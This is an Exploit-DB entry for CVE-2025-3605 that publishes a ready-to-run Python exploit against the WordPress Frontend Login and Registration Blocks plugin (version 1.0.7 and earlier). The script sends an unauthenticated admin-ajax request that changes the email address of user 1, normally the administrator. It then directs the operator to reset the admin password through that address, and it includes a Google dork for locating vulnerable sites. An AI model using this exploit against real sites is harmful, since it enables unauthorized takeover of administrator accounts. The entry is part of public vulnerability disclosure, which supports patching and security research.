WordPress Frontend Login and Registration Blocks Plugin 1.0.7 - Privilege Escalation

EDB-ID:

52291

CVE:

2025-3605

EDB Verified:

Author:

Md Shoriful Islam

Type:

webapps

Exploit:   /  

Platform:

Multiple

Date:

2025-05-13

Vulnerable App: 
# Exploit Title: WordPress Frontend Login and Registration Blocks Plugin 1.0.7 - Privilege Escalation
# Google Dork: inurl:/wp-content/plugins/frontend-login-and-registration-blocks/
# Date: 2025-05-12
# Exploit Author: Md Shoriful Islam (RootHarpy)
# Vendor Homepage: https://wordpress.org/plugins/frontend-login-and-registration-blocks/
# Software Link: https://downloads.wordpress.org/plugin/frontend-login-and-registration-blocks.1.0.7.zip
# Version: <= 1.0.7
# Tested on: Ubuntu 22.04 + WordPress 6.5.2
# CVE : CVE-2025-3605

import requests
import argparse
import sys

def display_banner():
    banner = """
  _____   _____   ___ __ ___ ___    ____  __  __  ___
 / __\ \ / / __|_|_  )  \_  ) __|__|__ / / / /  \| __|
| (__ \ V /| _|___/ / () / /|__ \___|_ \/ _ \ () |__ \
 \___| \_/ |___| /___\__/___|___/  |___/\___/\__/|___/
    """
    print(banner)

def suppress_ssl_warnings():
    requests.packages.urllib3.disable_warnings()

def initialize_session():
    new_session = requests.Session()
    new_session.verify = False
    new_session.headers.update({'User-Agent': "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"})
    return new_session

def parse_input_args():
    parser = argparse.ArgumentParser(description="Exploit for Privilege Escalation in Frontend Login and Registration Plugin <= 1.0.7")
    parser.add_argument("--target", "-t", required=True, help="Target URL to exploit")
    parser.add_argument("--target_user", "-u", default="1", help="User ID for target (default: 1)")
    parser.add_argument("--new_email", "-e", default="example@gmail.com", help="Email to change to (default: example@gmail.com)")
    return parser.parse_args()

def generate_payload(user, email):
    return {
        'action': 'flrblocksusersettingsupdatehandle',
        'user_id': user,
        'flr-blocks-email-update': email
    }

def execute_exploit(session, target_url, payload):
    try:
        return session.post(f"{target_url}/wp-admin/admin-ajax.php", data=payload)
    except Exception as error:
        print(f"Request error: {error}")
        sys.exit(1)

def process_response(response):
    if response.status_code == 200 and response.text.strip() != "0":
        print(f"Exploit succeeded! Response: {response.text}")
        print("Next: Go to the Forgot Password page and reset the admin password using the new email!")
    else:
        print(f"Exploit failed. HTTP Status: {response.status_code}, Response: {response.text}")

def run_exploit():
    display_banner()
    suppress_ssl_warnings()
    args = parse_input_args()
    session = initialize_session()
    payload = generate_payload(args.target_user, args.new_email)
    response = execute_exploit(session, args.target, payload)
    process_response(response)

if __name__ == "__main__":
    run_exploit()
Tags:
Advisory/Source: Link
Databases Links Sites Solutions
Exploits Search Exploit-DB OffSec Courses and Certifications
Google Hacking Submit Entry Kali Linux Learn Subscriptions
Papers SearchSploit Manual VulnHub OffSec Cyber Range
Shellcodes Exploit Statistics Proving Grounds
Penetration Testing Services
Exploits Google Hacking Papers Shellcodes
Search Exploit-DB Submit Entry SearchSploit Manual Exploit Statistics
OffSec Kali Linux VulnHub
Courses and Certifications Learn Subscriptions OffSec Cyber Range Proving Grounds Penetration Testing Services